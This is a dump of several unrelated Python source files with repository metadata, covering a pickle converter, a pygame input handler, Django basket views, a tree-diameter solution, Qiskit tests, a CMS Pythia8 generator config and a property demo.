| 2015-11-12T07:12:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
__author__ = 'NLP-PC'
from load_data import load_pickle
from save_data import dump_picle
def convert(source_file):
    """Re-pickle *source_file* next to itself with a '_v2.7.p' suffix,
    using pickle protocol 2 (loadable from Python 2.7)."""
    payload = load_pickle(source_file)
    target_path = str(source_file)[:-2] + '_v2.7.p'
    dump_picle(payload, target_path, protocol=2)

convert('./web_api/embedding_matrix_CVAT.p')
convert('./web_api/word_idx_map_CVAT.p')
|
[
"yunchaohe@gmail.com"
] |
yunchaohe@gmail.com
|
e6ba65eb534a04b8a0a6d2d01a017523e94bf4b8
|
547df2c76e6c3f4b7ac84441a14541eb0122f369
|
/input.py
|
bd899bfd115eddce0a04a80fcaedc1ff8b53ab29
|
[] |
no_license
|
daeken/space_game
|
8fa0d727faa7bb79f802546ca530f70312c3e48a
|
a02195f2ea9f442d5775ec75caa3464a3fa001de
|
refs/heads/master
| 2021-01-15T17:29:30.210249
| 2010-09-09T04:06:25
| 2010-09-09T04:06:25
| 897,841
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,164
|
py
|
import pygame
MOVE_DOWN = 1
MOVE_UP = 2
MOVE_LEFT = 4
MOVE_RIGHT = 8
class Input:
    """Translate pygame events into actions on the spaceship."""

    def __init__(self, spaceship):
        self.spaceship = spaceship
        pygame.key.set_repeat(1, 500)
        pygame.mouse.set_visible(False)

    def Handler(self, event):
        """Dispatch one pygame event; return False when the game should quit."""
        if event.type == pygame.KEYDOWN:
            arrow_moves = {
                pygame.K_UP: MOVE_UP,
                pygame.K_DOWN: MOVE_DOWN,
                pygame.K_LEFT: MOVE_LEFT,
                pygame.K_RIGHT: MOVE_RIGHT,
            }
            if event.key in arrow_moves:
                self.spaceship.Move(arrow_moves[event.key])
            elif event.unicode in (' ', 's'):
                self.spaceship.Fire()
            elif event.key == pygame.K_ESCAPE:
                return False
        elif event.type == pygame.MOUSEMOTION:
            self.spaceship.pos = list(event.pos)
        elif event.type == pygame.MOUSEBUTTONDOWN:
            self.spaceship.Fire()
        elif event.type == pygame.QUIT:
            return False
        return True
|
[
"cody.brocious@gmail.com"
] |
cody.brocious@gmail.com
|
672fa16630e8a40cf8b1e7b43f8c5612ba1a17f4
|
25b4fc4a54faf0f4217f3661477fa8f26cd60164
|
/Basket/views.py
|
2bcc37ebdf2ff013c67b218b2632fbe21f46d96d
|
[] |
no_license
|
AshtiNematian/Book_Store_Nematian_
|
6f601f69f0a25522ac351e4ad963f17011254289
|
b83ea7319dbead2be5812e2d001c58e7d906fff9
|
refs/heads/master
| 2023-07-21T03:56:48.386869
| 2021-09-03T17:03:17
| 2021-09-03T17:04:24
| 402,333,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,878
|
py
|
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render
from Basket.models import Basket
from Coupon.forms import CouponApplyForm
from Product.models import Book
def basket_summary(request):
    """Render the basket summary page for the current session."""
    current_basket = Basket(request)
    return render(request, 'summary.html', {'basket': current_basket})
def basket_add(request):
    """AJAX endpoint: add a book to the session basket.

    Adds the requested quantity only when the book is in stock and the
    quantity is available, then decrements the inventory.  Responds with
    the new basket item count as JSON.
    """
    basket = Basket(request)
    if request.POST.get('action') == 'post':
        product_id = int(request.POST.get('productid'))
        product_qty = int(request.POST.get('productqty'))
        product = get_object_or_404(Book, id=product_id)
        # Fix: the product was previously added unconditionally here AND again
        # inside the stock check below, doubling the quantity on every in-stock
        # add; it is now added only after the check passes.  The unused
        # CouponApplyForm instantiation was also removed.
        if product.inventory != 0 and product_qty < product.inventory:
            basket.add(product=product, qty=product_qty)
            product.remove_items_from_inventory(product_qty)
        basketqty = basket.__len__()
        response = JsonResponse({'qty': basketqty})
        return response
def basket_delete(request):
    """AJAX endpoint: remove a product from the session basket."""
    basket = Basket(request)
    if request.POST.get('action') != 'post':
        # same as the original implicit fall-through
        return None
    product_key = int(request.POST.get('productid'))
    basket.delete(product=product_key)
    remaining_qty = basket.__len__()
    subtotal = basket.get_total_price()
    return JsonResponse({'qty': remaining_qty, 'subtotal': subtotal})
def basket_update(request):
    """AJAX endpoint: set a product's quantity in the session basket."""
    basket = Basket(request)
    if request.POST.get('action') != 'post':
        # same as the original implicit fall-through
        return None
    item_id = int(request.POST.get('productid'))
    item_qty = int(request.POST.get('productqty'))
    basket.update(product=item_id, qty=item_qty)
    updated_qty = basket.__len__()
    subtotal = basket.get_total_price()
    return JsonResponse({'qty': updated_qty,
                         'subtotal': subtotal})
|
[
"you@example.com"
] |
you@example.com
|
71e602bd3e84c341393cd3c2e541ba225c4b8f71
|
99da8a6d2392472cb66e5b12c03142c90640186a
|
/BOJ/Tree/1967.py
|
ffb3ad1267e97478a1e3e17f42bfe629009b13f3
|
[] |
no_license
|
chorwonkim/__Algorithms__
|
cf6cf4ae5cf091d856397369b6db1bb41f925377
|
0c1e58410ae90b72c0d7e44a6179b8fedc786131
|
refs/heads/master
| 2022-09-28T16:59:20.841482
| 2022-09-25T09:57:58
| 2022-09-25T09:57:58
| 130,082,803
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,486
|
py
|
from sys import stdin
from collections import deque
Read = stdin.readline
n = int(Read())
graph = [[] for _ in range(n)]
# for _ in range(n-1):
# x, y, z = map(int, Read().split())
#
# graph[x-1].extend((y-1, z))
# graph[y-1].extend((x-1, z))
#
# print(graph)
#
#
# def func_1967(start, node):
# d = deque(start)
#
# while d:
# root = d.popleft()
# length = d.popleft()
#
# if visited[root]:
# node += 1
# continue
#
# visited[root] += length
# visited_path[node].append(root)
#
# for sub in graph[root]:
# d.append(sub)
#
#
# visited = [1] + [0 for _ in range(n-1)]
# visited_path = [[] for _ in range(n)]
# func_1967(graph[0], 0)
# print(visited)
# print(visited_path)
# for _ in range(n-1):
# x, y, z = map(int, Read().split())
#
# graph[x-1].extend((y-1, z))
#
# print(graph)
#
#
# def func_1967(start):
# d = deque(start)
#
# while d:
# root = d.popleft()
# length = d.popleft()
#
# visited[root] += length
#
#
# visited = [1] + [0 for _ in range(n-1)]
# for i in range(n):
# func_1967(graph[i])
# print(visited)
# for _ in range(n-1):
# x, y, z = map(int, Read().split())
#
# graph[x-1].extend((y-1, z))
# graph[y-1].extend((x-1, z))
#
# print(graph)
#
#
# def func_1967(start, node):
# d = deque(start)
#
# while d:
# root = d.popleft()
# length = d.popleft()
#
# if root > node:
# visited[root] += length
# else:
# visited[node] += visited[root]
#
#
# visited = [0 for _ in range(n)]
#
# for i in range(n):
# func_1967(graph[i], i)
#
# print(visited)
# Read the n-1 weighted edges of the tree; node labels are shifted to 0-based.
# Each adjacency list stores flat (from, to, weight) triples.
for _ in range(n-1):
    x, y, z = map(int, Read().split())
    graph[x-1].extend((x-1, y-1, z))
    graph[y-1].extend((y-1, x-1, z))

def func_1967(start):
    # BFS from `start`, filling visited_path[v] with the distance from start.
    # Distances propagate via the reverse edges: when a triple's target is
    # already visited (the parent), the parent's accumulated distance is added
    # onto the current node.
    d = deque(graph[start])
    visited[start] = True
    while d:
        # entries were pushed as flat triples, so pop three at a time
        node = d.popleft()
        root = d.popleft()
        length = d.popleft()
        if visited[root]:
            # reverse edge back to an already-finalized node: fold its
            # distance into this node's total
            visited_path[node] += visited_path[root]
            continue
        visited[root] = True
        visited_path[root] += length
        for sub in graph[root]:
            d.append(sub)

# Tree diameter (BOJ 1967): BFS from node 0 to find the farthest node t1,
# then BFS again from t1 -- the largest distance found is the diameter.
visited_path = [0 for _ in range(n)]
visited = [False for _ in range(n)]
func_1967(0)
temp = max(visited_path)
t1 = visited_path.index(temp)
visited_path = [0 for _ in range(n)]
visited = [False for _ in range(n)]
func_1967(t1)
print(max(visited_path))
|
[
"upheaval212@gmail.com"
] |
upheaval212@gmail.com
|
dea0ba39768a7c8ede0d9bf90e3b3f51c7138806
|
9c50f57a9cb32b44e86a0cdcbf61ead34754b085
|
/杂物间/python基础/day06/作业九.py
|
0b2ba089221b23677327707278422873cfa7b562
|
[] |
no_license
|
a1403893559/rg201python
|
c3f115011981393c86a0150e5281096651712ad4
|
448f04c86e4c7fd30e3a2a4f9121b934ae1d49be
|
refs/heads/master
| 2020-03-15T23:32:17.723403
| 2018-03-18T12:59:43
| 2018-03-18T12:59:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
# 题目要求是 使用字典 存储熟人信息 其实呢 就是名片
shu_ren = {'name':'李文浩','age':'18','city':'山西煤窑'}
for key,value in shu_ren.items():
print('%s:%s'%(key,value))
|
[
"wengwenyu@aliyun.com"
] |
wengwenyu@aliyun.com
|
377cdbfbe4bc9e17cc34e3664bff5057689407cd
|
4ae7cdc9292009398a292bdf6bee61428559fdfd
|
/SourceCodeTools/code/data/sourcetrail/nodes_of_interest_from_dataset.py
|
d9e69bccbc79dc112cfbe4294211e25a29fc1878
|
[] |
no_license
|
VitalyRomanov/method-embedding
|
52a4e6e7bf726b4db0872902a0eaf1d8cb82b4a8
|
1c8f0fc04eb1f495555272d9747fd2fea68525e1
|
refs/heads/master
| 2023-08-31T17:39:04.051912
| 2023-01-08T05:02:52
| 2023-01-08T05:02:52
| 219,153,628
| 5
| 7
| null | 2023-07-22T20:27:20
| 2019-11-02T12:54:12
|
Python
|
UTF-8
|
Python
| false
| false
| 707
|
py
|
import json
def get_node_ids_from_dataset(dataset_path):
node_ids = []
with open(dataset_path, "r") as dataset:
for line in dataset:
entry = json.loads(line)
for _, _, id_ in entry["replacements"]:
node_ids.append(int(id_))
return node_ids
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("dataset")
parser.add_argument("output")
args = parser.parse_args()
node_ids = get_node_ids_from_dataset(args.dataset)
with open(args.output, "w") as sink:
sink.write("node_id\n")
for id_ in node_ids:
sink.write(f"{id_}\n")
if __name__ == "__main__":
main()
|
[
"mortiv16@gmail.com"
] |
mortiv16@gmail.com
|
7351ff746480493141320d2010c33f6f1d6936d8
|
61b9e597f0bd27ee7ec86188b7e10518ee30425c
|
/tests/run_cache_experiments.py
|
cc4d49b11eb3b1381b7a355b51f7b474a639d114
|
[] |
no_license
|
sirrice/dbwipes_src
|
eeb369d09ba28cb1ab3ffa70551c2b253dd39cb3
|
4d42b7d51af190b21679f38150f85dec1496d78c
|
refs/heads/master
| 2021-01-21T12:36:22.888835
| 2014-04-23T20:53:16
| 2014-04-23T20:53:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,696
|
py
|
import os
from sqlalchemy import *
from common import *
def print_clusters(sub, dim, clusters=[], tuples=[], title=''):
xattr = 'a_%d' % dim
yattr = 'a_%d' % (dim+1)
for cluster in clusters:
bbox = tuple(map(list, zip(*cluster.bbox)))
# we want bounds for attrs a_dim, a_dim+1, but bbox cols
# may not be ordered as we like
if xattr in cluster.cols:
xidx = cluster.cols.index(xattr)
x = bbox[xidx]
x[0] = max(0, x[0])
x[1] = min(100, x[1])
else:
x = [0, 100]
if yattr in cluster.cols:
yidx = cluster.cols.index(yattr)
y = bbox[yidx]
y[0] = max(0, y[0])
y[1] = min(100, y[1])
else:
y = [0, 100]
c = cm.jet(cluster.error)
r = Rect((x[0], y[0]), x[1]-x[0], y[1]-y[0], alpha=min(1., max(0.2,cluster.error)), ec=c, fill=False, lw=1.5)
sub.add_patch(r)
if tuples:
cols = zip(*tuples)
xs, ys, cs = cols[dim], cols[dim+1], cols[-2]
cs = np.array(cs) / 100.
sub.scatter(xs, ys, c=cs, alpha=0.5, lw=0)
sub.set_ylim(-5, 105)
sub.set_xlim(-5, 105)
sub.set_title(title)
def print_all_clusters(pp, db, tablename, learner, c):
try:
all_clusters = [cluster.clone() for cluster in learner.all_clusters]
all_clusters = normalize_cluster_errors(all_clusters)
clusters = [cluster.clone() for cluster in learner.final_clusters]
clusters = normalize_cluster_errors(clusters)
best_clusters = sorted(clusters, key=lambda c: c.error, reverse=True)
best_clusters = best_clusters[:2]
best_clusters[0].error = 1
tuples = get_tuples_in_bounds(db, tablename, [], 'g = 7')
for cl in clusters:
print str(cl), cl.c_range
for dim in xrange(len(tuples[0])-4):
suffix = "%.4f dim %d" % (c, dim)
fig = plt.figure(figsize=(12, 4))
print_clusters(fig.add_subplot(1, 3, 1), dim, all_clusters, tuples=tuples,title="merged %s" % suffix)
print_clusters(fig.add_subplot(1, 3, 2), dim, clusters, tuples=tuples,title="merged %s" % suffix)
print_clusters(fig.add_subplot(1, 3, 3), dim, best_clusters, tuples=tuples, title="best %s" % suffix)
plt.savefig(pp, format='pdf')
except Exception as e:
import traceback
traceback.print_exc()
pdb.set_trace()
pass
def run(pp, cutoff, **params):
dataset = params['dataset']
test_datas = get_test_data(datasetnames[dataset])
tablename = test_datas[-1]
dbname = test_datas[0]
db = create_engine('postgresql://localhost/%s' % dbname)
costs, rules, all_ids, table_size, learner = run_experiment(dataset, **params)
cost = costs['cost_total']
ft = learner.full_table
print len(ft)
truth = [int(row['id'].value) for row in ft if row['v'] >= cutoff]
all_stats = [compute_stats(ids, truth, table_size) for ids in all_ids]
stats, rule, ids = tuple(zip(all_stats, rules, all_ids)[0])
data = tuple([tablename,params['c'],cost]+list(stats))
print "stats:%s,c(%.3f),cost(%.2f),%.6f,%.6f,%.6f,%.6f" % data
print 'stats:%s'% str(sdrule_to_clauses(rule.simplify())[0])
print_all_clusters(pp, db, tablename, learner, params['c'])
return costs
def warmup(dim, cutoff, **kwargs):
dataset = "data_%d_%d_1000_0d50_%duo" % (dim, dim, cutoff)
params = {
'klass':BDT,
'nbadresults' : 10,
'epsilon':0.005,
'tau':[0.1, 0.5],
'p' : 0.7,
'l':.5,
'min_pts' : 10,
'min_improvement':.01,
'granularity':15,
'max_wait':1,
'naive':False,
'use_mtuples':False,
'use_cache': False
}
params.update(kwargs)
ft, bts, gts, truth, aggerr, cols = get_parameters(dataset, **params)
params.update({
'aggerr' : aggerr,
'cols' : cols,
'tablename' : dataset,
'dataset' : dataset
})
learner = BDT(**params)
learner.setup_tables(ft, bts, gts, **params)
learner.get_partitions(ft, bts, gts, **params)
def run_cache(dim, cutoff, cs, **kwargs):
dataset = kwargs.get('dataset', "data_%d_%d_1000_0d50_%duo" % (dim, dim, cutoff))
params = {
'klass':BDT,
'nbadresults' : 10,
'epsilon':0.005,
'tau':[0.1, 0.5],
'p' : 0.7,
'l':.5,
'min_pts' : 10,
'min_improvement':.01,
'granularity':15,
'max_wait':20,
'naive':False,
'use_mtuples':False,
'use_cache': False,
dataset: dataset
}
params.update(kwargs)
pp = PdfPages('figs/topdown_all_%s.pdf' % str(dataset))
cost_dicts = []
for c in cs:
params['c'] = c
cost_dict = run(pp, cutoff, **params)
cost_dicts.append(cost_dict)
pp.close()
return cost_dicts
def reset_cache():
try:
os.system('rm dbwipes*.cache')
except:
pass
if __name__ == '__main__':
np.seterr(all='raise')
if len(sys.argv) < 4:
print "python run_cache_experiments.py [dimensions] [30|80] [cache? 0|1] [list of cs values]"
print "cs values defaults to [.5, .4, .3, .2, .1, .05, 0]"
sys.exit()
dim = int(sys.argv[1])
uo = int(sys.argv[2])
cache = bool(int(sys.argv[3]))
cs = map(float, sys.argv[4:])
if not cs:
cs = [.5, .4, .3, .2, .1, 0.05, 0.0]
#reset_cache()
#cachecost_dicts = run_cache(dim, uo, cs, l=0.95, tree_alg='rt', klass=NDT, use_cache=cache, tau= [0.1, 0.5])
cachecost_dicts = run_cache(dim, uo, cs, l=0.85, tree_alg='rt', klass=BDT,
epsilon=0.001, use_cache=cache, tau= [0.02, 0.5],
c_range=[0.01, 0.7],
dataset='data2clust_2_2_2k_vol20_uo80')
print "c,total,partbad,partgood,split,merge,cache"
for c, cd in zip(cs, cachecost_dicts):
print "%.4f,%.4f,%.4f,%.4f,%.4f,%.4f,%d" % (
c,
cd.get('cost_total', -1),
cd.get('cost_partition_bad', -1),
cd.get('cost_partition_good', -1),
cd.get('cost_split', -1),
cd.get('cost_merge', -1),
cache
)
|
[
"sirrice@gmail.com"
] |
sirrice@gmail.com
|
44a318abdeab78a4e1fc6de40b655367ad1b4e90
|
d30aba490a9527e7fc1f31e178b5f1c3067ae84d
|
/build/combined_robot_hw_tests/catkin_generated/pkg.develspace.context.pc.py
|
13c2aeff20a5c6b70551c5306392f462066cbd7e
|
[] |
no_license
|
weetinygit/tart
|
130845b9c0e7b01d0a5a5177b056c85495e4e5cc
|
339344cb9ef0561655f73f4609f340974113785a
|
refs/heads/master
| 2021-09-13T07:38:39.706301
| 2018-04-26T21:18:19
| 2018-04-26T21:18:19
| 111,699,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/weety/tart5/src/roscontrol/src/ros_control/combined_robot_hw_tests/include".split(';') if "/home/weety/tart5/src/roscontrol/src/ros_control/combined_robot_hw_tests/include" != "" else []
PROJECT_CATKIN_DEPENDS = "combined_robot_hw;hardware_interface;roscpp".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lcombined_robot_hw_tests".split(';') if "-lcombined_robot_hw_tests" != "" else []
PROJECT_NAME = "combined_robot_hw_tests"
PROJECT_SPACE_DIR = "/home/weety/tart5/devel/.private/combined_robot_hw_tests"
PROJECT_VERSION = "0.12.0"
|
[
"weetingyit36@gmail.com"
] |
weetingyit36@gmail.com
|
145d8b4115c4d955272564fad60a095f75f40fab
|
4a4cc797f9a46a2c09075abfc2033c480eaa5486
|
/mini-programs/week_2/lectures/lecture_1_logical_data_type, conditional_operator_and_cycles.py
|
25f6b5cd500aa4069b3494dd7ee0525bd4c0d4d9
|
[] |
no_license
|
h1mik/python_programs
|
efa806eb9803c3e50aee845d5e0be9560d65f2be
|
33e169ef33f70bc94cd535ecf44e852ae58c7a64
|
refs/heads/main
| 2023-02-04T14:45:04.855119
| 2020-12-26T09:25:22
| 2020-12-26T09:25:22
| 309,483,948
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 333
|
py
|
# True and False |
# (==) - равно | (> ) - больше
# (!=) - не равно | (<=) - меньше равно
# (<) - меньше | (>=) - больше равно
# (and or) - бинарные | (not) - унарная
x = 4
y = 6
print(x < y)
st1 = "Books"
st2 = "Alpha"
print(not st1 > st2)
|
[
"seigneur.h1mik@gmail.com"
] |
seigneur.h1mik@gmail.com
|
95591f4a5fbda649b1639552fefac75304660451
|
917a690cad8fece9102ba3191284f1ab83a8aeaf
|
/pypubmed/util/__init__.py
|
19406ff5499cccc2d0e8abe969aa2ba74bd4aff0
|
[
"MIT"
] |
permissive
|
wisRen/pypubmed
|
1751f429e38f4fd58d058584d36e7a4031c02660
|
6dd1b6ee7e8c7cf2a10885ed7662a4e2d16fa8e4
|
refs/heads/master
| 2023-06-21T05:10:47.579755
| 2021-08-11T06:01:05
| 2021-08-11T06:01:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
import os
def safe_open(filename, mode='r'):
if 'w' in mode:
dirname = os.path.dirname(filename)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
if filename.endswith('.gz'):
import gzip
return gzip.open(filename, mode=mode)
return open(filename, mode=mode)
|
[
"suqingdong1114@gmail.com"
] |
suqingdong1114@gmail.com
|
d5017384859880726a5577c4f806d918eefbdd79
|
d85163b314c220e88e99426ab4e10f031423aeb2
|
/qc/outremont/districts/definition.py
|
3c55d715faa90a28b9fc8ce3ea1aa64642c9bdbf
|
[] |
no_license
|
opennorth-archive/represent-canada-data
|
dc3e98d4f24ce877ec2dfc9e40675e561912c45f
|
f1792a724f0a58d596e3376c71b6b3e64f7887b0
|
refs/heads/master
| 2021-01-22T05:10:00.952023
| 2014-04-04T19:51:40
| 2014-04-04T19:52:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 780
|
py
|
# coding: utf-8
from datetime import date
import boundaries
boundaries.register(u'Outremont districts',
domain=u'Outremont, Montréal, QC',
last_updated=date(2013, 10, 16),
name_func=lambda f: re.sub(u'', u'—', f.get('NOM_DISTRI')), # control character, m-dash
authority=u'Ville de Montréal',
source_url='http://donnees.ville.montreal.qc.ca/dataset/elections-2013-districts-electoraux',
licence_url='http://donnees.ville.montreal.qc.ca/licence/licence-texte-complet/',
data_url='http://donnees.ville.montreal.qc.ca/storage/f/2013-10-16T14%3A16%3A09.092Z/districtelect.zip',
encoding='iso-8859-1',
metadata={'ocd_division': u'ocd-division/country:ca/csd:2466023/borough:outremont'},
ogr2ogr=u'''-where "ARRONDISSE='Outremont'"''',
)
|
[
"james@slashpoundbang.com"
] |
james@slashpoundbang.com
|
4245cd1c1914d5cde8d48f77bc3b37941ee4b174
|
0eb0cc67c11baec9caf82b61f161c091c7043364
|
/api_book/wsgi.py
|
d6be60053dfb1ff1084624d501fbd456288cf37a
|
[] |
no_license
|
juniorcarvalho/work-at-olist
|
dd648fceaed5e0f8b165ac1279cfb1ae1ccae0a5
|
fc59143c8d295da50aa42b312aa28ce1202ec890
|
refs/heads/master
| 2022-07-17T23:54:29.071100
| 2020-05-19T22:40:11
| 2020-05-19T22:40:11
| 264,524,765
| 0
| 0
| null | 2020-05-16T20:49:54
| 2020-05-16T20:49:54
| null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
"""
WSGI config for api_book project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from dj_static import Cling
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_book.settings')
application = Cling(get_wsgi_application())
|
[
"joseadolfojr@gmail.com"
] |
joseadolfojr@gmail.com
|
dd071b116f01cd5df223b91b2af30535c163e630
|
7d17161a77ad04ea1de1dabe84619b6c4fffe2ad
|
/test/python/circuit/library/test_piecewise_chebyshev.py
|
14660435d445ca3a3e2114e685177d21bf94b665
|
[
"Apache-2.0"
] |
permissive
|
annos-IBM/qiskit-terra
|
5e3b93a089a6e00c9279bf82735d78b497e92023
|
78ece7ad9baba64395eea98c45fb83a30b04c835
|
refs/heads/main
| 2023-05-28T20:42:19.805833
| 2021-06-09T03:47:48
| 2021-06-09T03:47:48
| 375,329,407
| 1
| 0
|
Apache-2.0
| 2021-06-09T11:22:14
| 2021-06-09T11:22:14
| null |
UTF-8
|
Python
| false
| false
| 4,954
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test the piecewise Chebyshev approximation."""
import unittest
from collections import defaultdict
import numpy as np
from ddt import ddt, data, unpack
from qiskit.test.base import QiskitTestCase
from qiskit import BasicAer, execute
from qiskit.circuit import QuantumCircuit
from qiskit.circuit.library.arithmetic.piecewise_chebyshev import PiecewiseChebyshev
@ddt
class TestPiecewiseChebyshev(QiskitTestCase):
"""Test the piecewise Chebyshev approximation."""
def assertFunctionIsCorrect(self, function_circuit, reference):
"""Assert that ``function_circuit`` implements the reference function ``reference``."""
function_circuit._build()
num_state_qubits = function_circuit.num_state_qubits
num_ancilla_qubits = function_circuit.num_ancillas
circuit = QuantumCircuit(num_state_qubits + 1 + num_ancilla_qubits)
circuit.h(list(range(num_state_qubits)))
circuit.append(function_circuit.to_instruction(), list(range(circuit.num_qubits)))
backend = BasicAer.get_backend("statevector_simulator")
statevector = execute(circuit, backend).result().get_statevector()
probabilities = defaultdict(float)
for i, statevector_amplitude in enumerate(statevector):
i = bin(i)[2:].zfill(circuit.num_qubits)[num_ancilla_qubits:]
probabilities[i] += np.real(np.abs(statevector_amplitude) ** 2)
unrolled_probabilities = []
unrolled_expectations = []
for i, probability in probabilities.items():
x, last_qubit = int(i[1:], 2), i[0]
if last_qubit == "0":
expected_amplitude = np.cos(reference(x)) / np.sqrt(2 ** num_state_qubits)
else:
expected_amplitude = np.sin(reference(x)) / np.sqrt(2 ** num_state_qubits)
unrolled_probabilities += [probability]
unrolled_expectations += [np.real(np.abs(expected_amplitude) ** 2)]
np.testing.assert_array_almost_equal(
unrolled_probabilities, unrolled_expectations, decimal=3
)
@data((lambda x: np.arcsin(1 / x), 2, [2, 4], 2), (lambda x: x / 8, 1, [1, 8], 3))
@unpack
def test_piecewise_chebyshev(self, f_x, degree, breakpoints, num_state_qubits):
"""Test the piecewise Chebyshev approximation."""
def pw_poly(x):
if breakpoints[0] <= x < breakpoints[-1]:
return f_x(x)
return np.arcsin(1)
pw_approximation = PiecewiseChebyshev(f_x, degree, breakpoints, num_state_qubits)
self.assertFunctionIsCorrect(pw_approximation, pw_poly)
def test_piecewise_chebyshev_mutability(self):
"""Test the mutability of the piecewise Chebyshev approximation."""
def pw_poly(x, f_x):
if breakpoints[0] <= x < breakpoints[-1]:
return f_x(x)
return np.arcsin(1)
def f_x_1(x):
return x / 2
pw_approximation = PiecewiseChebyshev(f_x_1)
with self.subTest(msg="missing number of state qubits"):
with self.assertRaises(AttributeError): # no state qubits set
print(pw_approximation.draw())
with self.subTest(msg="default setup, just setting number of state qubits"):
pw_approximation.num_state_qubits = 2
pw_approximation.f_x = f_x_1
# set to the default breakpoints for pw_poly
breakpoints = [0, 4]
pw_approximation.breakpoints = breakpoints
self.assertFunctionIsCorrect(pw_approximation, lambda x: pw_poly(x, f_x_1))
def f_x_2(x):
return x / 4
with self.subTest(msg="setting non-default values"):
breakpoints = [0, 2]
degree = 2
pw_approximation.breakpoints = breakpoints
pw_approximation.degree = degree
pw_approximation.f_x = f_x_2
self.assertFunctionIsCorrect(pw_approximation, lambda x: pw_poly(x, f_x_2))
def f_x_3(x):
return x ** 2
with self.subTest(msg="changing all values"):
pw_approximation.num_state_qubits = 4
breakpoints = [1, 3, 6]
degree = 3
pw_approximation.breakpoints = breakpoints
pw_approximation.degree = degree
pw_approximation.f_x = f_x_3
self.assertFunctionIsCorrect(pw_approximation, lambda x: pw_poly(x, f_x_3))
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
annos-IBM.noreply@github.com
|
b9fdfca21b63d92c178c7c1277d346717e9cdced
|
0fccee4c738449f5e0a8f52ea5acabf51db0e910
|
/genfragments/ThirteenTeV/ADD/ADDmonoJet_MD_6_d_6_TuneCUETP8M1_13TeV_pythia8_cfi.py
|
85a31581696b8c9fa838b33ac1ac34c210e6a0db
|
[] |
no_license
|
cms-sw/genproductions
|
f308ffaf3586c19b29853db40e6d662e937940ff
|
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
|
refs/heads/master
| 2023-08-30T17:26:02.581596
| 2023-08-29T14:53:43
| 2023-08-29T14:53:43
| 11,424,867
| 69
| 987
| null | 2023-09-14T12:41:28
| 2013-07-15T14:18:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,923
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(13000.0),
maxEventsToPrint = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettings = cms.vstring('Tune:preferLHAPDF = 2',
'Main:timesAllowErrors = 10000',
'Check:epTolErr = 0.01',
'Beams:setProductionScalesFromLHEF = off',
'SLHA:keepSM = on',
'SLHA:minMassSM = 1000.',
'ParticleDecays:limitTau0 = on',
'ParticleDecays:tau0Max = 10',
'ParticleDecays:allowPhotonRadiation = on'),
pythia8CUEP8M1Settings = cms.vstring('Tune:pp 14',
'Tune:ee 7',
'MultipartonInteractions:pT0Ref=2.4024',
'MultipartonInteractions:ecmPow=0.25208',
'MultipartonInteractions:expPow=1.6'),
pythia8_unparticle = cms.vstring('ExtraDimensionsLED:monojet = on',
'ExtraDimensionsLED:CutOffmode = 1',
'ExtraDimensionsLED:t = 0.5',
'ExtraDimensionsLED:n = 6',
'ExtraDimensionsLED:MD = 6000.',
'5000039:m0 = 1200.',
'5000039:mWidth = 1000.',
'5000039:mMin = 1.',
'5000039:mMax = 13990.',
'PhaseSpace:pTHatMin = 80.',
'PartonLevel:ISR = on',
'PartonLevel:FSR = on',
'ParticleDecays:limitTau0 = on',
'ParticleDecays:tauMax = 10'),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'pythia8_unparticle')
)
)
|
[
"ksung@cern.ch"
] |
ksung@cern.ch
|
7b45add26ddf9df79e85d7c7e09bc534253dae7d
|
a8139ccd50a27861d3c5a4168fd0e4b351c0a514
|
/material/code/advanced_oop_and_python_topics/4_ManagedAttributeDemo/test.py
|
9e8897b3d4a283a1395d9d8c0fe56f8a27ae63ef
|
[] |
no_license
|
shambhand/pythontraining
|
a124aa1485c3ce0e589fc2cd93c1e991746432e4
|
24dd923e2b2c07c70500775e3665e2a527240329
|
refs/heads/master
| 2021-05-17T22:54:45.331127
| 2019-01-11T03:12:59
| 2019-01-11T03:12:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
class Person:
def __init__(self, name):
self._name = name
@property # name = property(name)
def name(self):
"name property docs"
print('fetch...')
return self._name
@name.setter # name = name.setter(name)
